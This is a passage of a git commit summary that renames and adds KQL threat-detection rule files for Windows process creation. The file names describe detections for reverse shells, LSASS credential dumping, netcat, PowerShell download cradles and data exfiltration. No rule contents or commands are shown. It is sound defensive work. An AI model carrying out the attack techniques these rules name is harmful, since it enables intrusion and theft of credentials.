windows/process_creation}/potential_arbitrary_command_execution_using_msdt_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_arbitrary_command_execution_via_ftp_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_arbitrary_dll_load_using_winword.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_arbitrary_file_download_using_office_application.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_arbitrary_file_download_via_cmdl32_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_binary_impersonating_sysinternals_tools.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_binary_proxy_execution_via_cdb_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_browser_data_stealing.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_cobaltstrike_process_patterns.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/potential_com_objects_download_cradles_usage_process_creation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_command_line_path_traversal_evasion_attempt.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_commandline_obfuscation_using_escape_characters.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_commandline_path_traversal_via_cmd_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/potential_configuration_and_service_reconnaissance_via_reg_exe.kql (100%) rename KQL/rules/{Execution => 
windows/process_creation}/potential_cookies_session_hijacking.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_credential_dumping_via_lsass_process_clone.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_credential_dumping_via_wer.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/potential_crypto_mining_activity.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_data_exfiltration_activity_via_commandline_tools.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_data_stealing_via_chromium_headless_debugging.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_via_binary_rename.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_via_right_to_left_override.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/potential_discovery_activity_via_dnscmd_exe.kql (100%) rename KQL/rules/{Command and Control => 
windows/process_creation}/potential_dll_file_download_via_powershell_invoke_webrequest.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_dll_injection_or_execution_using_tracker_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_dll_injection_via_acccheckconsole.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_dll_sideloading_via_deviceenroller_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_dosfuscation_activity.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/potential_download_upload_activity_using_type_command.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_dropper_script_execution_via_wscript_cscript.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_encoded_powershell_patterns_in_commandline.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql (100%) rename KQL/rules/{Resource Development => windows/process_creation}/potential_execution_of_sysinternals_tools.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_fake_instance_of_hxtsr_exe_executed.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_file_download_via_ms_appinstaller_protocol_handler.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/potential_file_overwrite_via_sysinternals_sdelete.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_homoglyph_attack_using_lookalike_characters.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/potential_lateral_movement_via_windows_remote_shell.kql (100%) rename 
KQL/rules/{Defense Evasion => windows/process_creation}/potential_lethalhta_technique_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_lsass_process_dump_via_procdump.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_manage_bde_wsf_abuse_to_proxy_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_memory_dumping_activity_via_livekd.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_meterpreter_cobaltstrike_activity.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_mftrace_exe_abuse.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_mpclient_dll_sideloading_via_defender_binaries.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_msiexec_masquerading.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/potential_mstsc_shadowing_activity.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_network_sniffing_activity_using_network_tools.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_ntlm_coercion_via_certutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_obfuscated_ordinal_call_via_rundll32.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_password_spraying_attempt_using_dsacls_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_persistence_attempt_via_existing_service_tampering.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_persistence_attempt_via_run_keys_using_reg_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_persistence_via_logon_scripts_commandline.kql (100%) rename KQL/rules/{Privilege Escalation => 
windows/process_creation}/potential_persistence_via_microsoft_compatibility_appraiser.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_persistence_via_netsh_helper_dll.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_persistence_via_powershell_search_order_hijacking_task.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_powershell_command_line_obfuscation.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_powershell_console_history_access_attempt_via_history_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_powershell_downgrade_attack.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_powershell_execution_policy_tampering_proccreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_powershell_execution_via_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_powershell_obfuscation_via_reversed_commands.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_powershell_obfuscation_via_wchar_char.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_powershell_reverseshell_connection.kql (100%) rename KQL/rules/{Resource Development => windows/process_creation}/potential_privilege_escalation_to_local_system.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/potential_privilege_escalation_via_service_permissions_weakness.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/potential_process_execution_proxy_via_cl_invocation_ps1.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_process_injection_via_msra_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_product_class_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_product_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_provlaunch_exe_binary_proxy_execution_abuse.kql (100%) rename KQL/rules/{Resource Development => windows/process_creation}/potential_psexec_remote_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_rdp_session_hijacking_activity.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/potential_rdp_tunneling_via_plink.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/potential_rdp_tunneling_via_ssh.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/potential_recon_activity_using_driverquery_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/potential_recon_activity_via_nltest_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_reflectdebugger_content_execution_via_werfault_exe.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/potential_register_app_vbs_lolscript_abuse.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_regsvr32_commandline_flag_anomaly.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/potential_remote_desktop_tunneling.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_renamed_rundll32_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_rundll32_execution_with_dll_stored_in_ads.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_shelldispatch_dll_functionality_abuse.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/potential_shim_database_persistence_via_sdbinst_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_signing_bypass_via_windows_developer_features.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/potential_smb_relay_attack_tool_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_spn_enumeration_via_setspn_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/potential_suspicious_activity_using_secedit.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_suspicious_browser_launch_from_document_reader_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_suspicious_mofcomp_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/potential_suspicious_registry_file_imported_via_reg_exe.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/potential_suspicious_windows_feature_enabled_proccreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_sysinternals_procdump_evasion.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql (55%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_tampering_with_security_products_via_wmic.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_uac_bypass_via_sdclt_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_winapi_calls_via_commandline.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_windows_defender_tampering_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_cabinet_file_expansion.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_call_to_win32_nteventlogfile_class.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_child_process_of_clickonce_application.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_child_process_of_diskshadow_exe.kql (100%) rename 
KQL/rules/{Persistence => windows/process_creation}/potentially_suspicious_child_process_of_keyscrambler_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_child_process_of_regsvr32.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_child_process_of_vscode.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_child_process_of_winrar_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_child_processes_spawned_by_conhost.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_cmd_shell_output_redirect.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potentially_suspicious_command_targeting_teams_sensitive_files.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/potentially_suspicious_desktop_background_change_using_reg_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_dll_registered_via_odbcconf_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_electron_application_commandline.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_event_viewer_child_process.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_execution_from_parent_process_in_public_folder.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_execution_of_pdqdeployrunner.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_googleupdate_child_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potentially_suspicious_jwt_token_search_via_cli.kql (100%) create mode 100644 KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_office_document_executed_from_trusted_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_ping_copy_command_combination.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_regsvr32_http_ftp_pattern.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_regsvr32_http_ip_pattern.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_rundll32_activity.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/potentially_suspicious_usage_of_qemu.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_webdav_lnk_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_windows_app_activity.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_base64_encoded_frombase64string_cmdlet.kql (100%) 
rename KQL/rules/{Execution => windows/process_creation}/powershell_base64_encoded_iex_cmdlet.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_base64_encoded_invoke_keyword.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_base64_encoded_mppreference_cmdlet.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_base64_encoded_reflective_assembly_load.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_base64_encoded_wmi_classes.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_defender_disable_scan_feature.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_defender_exclusion.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_download_and_execution_cradles.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_download_pattern.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_executed_from_headless_conhost_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_execution_with_potential_decryption_capabilities.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/powershell_get_clipboard_cmdlet_via_cli.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/powershell_get_process_lsass.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_inline_execution_from_a_file.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/powershell_sam_copy.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/powershell_script_change_permission_via_set_acl.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_script_run_in_appdata.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_set_acl_on_windows_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_token_obfuscation_process_creation.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/powershell_web_access_feature_enabled_via_dism.kql (100%) create mode 100644 KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql rename KQL/rules/{Command and Control => windows/process_creation}/printbrm_zip_creation_of_extraction.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/private_keys_reconnaissance_via_commandline_tools.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/privilege_escalation_via_named_pipe_impersonation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/procdump_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/process_access_via_trolleyexpress_exclusion.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/process_creation_using_sysnative_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/process_execution_from_a_potentially_suspicious_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/process_launched_without_image_name.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/process_memory_dump_via_comsvcs_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/process_memory_dump_via_dotnet_dump.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/process_memory_dump_via_rdrleakdiag_exe.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/process_proxy_execution_via_squirrel_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/process_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/proxy_execution_via_vshadow.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/proxy_execution_via_wuauclt_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/psexec_execution.kql (100%) rename KQL/rules/{Resource Development => windows/process_creation}/psexec_paexec_escalation_to_local_system.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/psexec_service_child_process_execution_as_local_system.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/psexec_service_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_3proxy_execution.kql (100%) create mode 100644 KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql rename KQL/rules/{Discovery => windows/process_creation}/pua_adidnsdump_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_advanced_ip_scanner_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_advanced_port_scanner_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_advancedrun_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/pua_advancedrun_suspicious_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_chisel_tunneling_tool_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/pua_cleanwipe_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_crassus_execution.kql (100%) rename KQL/rules/{Resource Development => windows/process_creation}/pua_csexec_execution.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/pua_defendercheck_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/pua_dit_snapshot_viewer.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_fast_reverse_proxy_frp_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_iox_tunneling_tool_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/pua_mouse_lock_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_netcat_suspicious_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_ngrok_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_nimgrab_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_nircmd_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_nircmd_execution_as_local_system.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_nmap_zenmap_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_nps_tunneling_tool_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_nsudo_execution.kql (100%) rename KQL/rules/{Reconnaissance => windows/process_creation}/pua_pingcastle_execution.kql (100%) rename KQL/rules/{Reconnaissance => windows/process_creation}/pua_pingcastle_execution_from_potentially_suspicious_parent.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/pua_potential_pe_metadata_tamper_using_rcedit.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/pua_process_hacker_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_radmin_viewer_utility_execution.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/pua_rclone_execution.kql (100%) rename KQL/rules/{Exfiltration => 
windows/process_creation}/pua_restic_backup_tool_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_runxcmd_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_seatbelt_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_softperfect_netscan_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/pua_system_informer_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_trufflehog_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/pua_webbrowserpassview_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_wsudo_suspicious_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/pubprn_vbs_proxy_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/python_function_execution_security_warning_disabled_in_excel.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/python_inline_command_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/python_spawning_pretty_tty_on_windows.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/query_usage_to_exfil_data.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/quickassist_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/raccine_uninstall.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/rar_usage_with_password_and_compression_level.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/rdp_connection_allowed_via_netsh_exe.kql (100%) create mode 100644 KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql rename KQL/rules/{Lateral Movement => 
windows/process_creation}/rdp_port_forwarding_rule_added_via_netsh_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/read_contents_from_stdin_via_cmd_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/rebuild_performance_counter_values_via_lodctr_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/recon_command_output_piped_to_findstr_exe.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/recon_information_for_export_with_command_prompt.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/reg_add_suspicious_paths.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/regasm_exe_execution_without_commandline_flags_or_files.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/regedit_as_trusted_installer.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/register_app_vbs_proxy_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/registry_export_of_third_party_credentials.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/registry_manipulation_via_wmi_stdregprov.kql (100%) create mode 100644 KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql rename KQL/rules/{Persistence => windows/process_creation}/registry_modification_via_regini_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/regsvr32_dll_execution_with_suspicious_file_extension.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/regsvr32_dll_execution_with_uncommon_extension.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/regsvr32_execution_from_highly_suspicious_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/regsvr32_execution_from_potential_suspicious_location.kql (100%) rename KQL/rules/{Command and Control => 
windows/process_creation}/remote_access_tool_anydesk_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_anydesk_execution_from_suspicious_folder.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_anydesk_piped_password_via_cli.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_anydesk_silent_installation.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_gotoassist_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_logmein_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_meshagent_command_execution_via_meshcentral.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_netsupport_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_potential_meshagent_execution_windows.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_renamed_meshagent_execution_windows.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/remote_access_tool_rurat_execution_from_unusual_location.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_screenconnect_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/remote_access_tool_screenconnect_installation_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql (100%) rename KQL/rules/{Execution => 
windows/process_creation}/remote_access_tool_screenconnect_remote_command_execution.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/remote_access_tool_screenconnect_server_web_shell_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_simple_help_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/remote_access_tool_team_viewer_session_started_on_windows_host.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_ultraviewer_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/remote_chm_file_download_execution_via_hh_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/remote_code_execute_via_winrm_vbs.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_file_download_via_desktopimgdownldr_utility.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/remote_file_download_via_findstr_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/remote_powershell_session_host_process_winrm_.kql (100%) rename KQL/rules/{Defense Evasion => 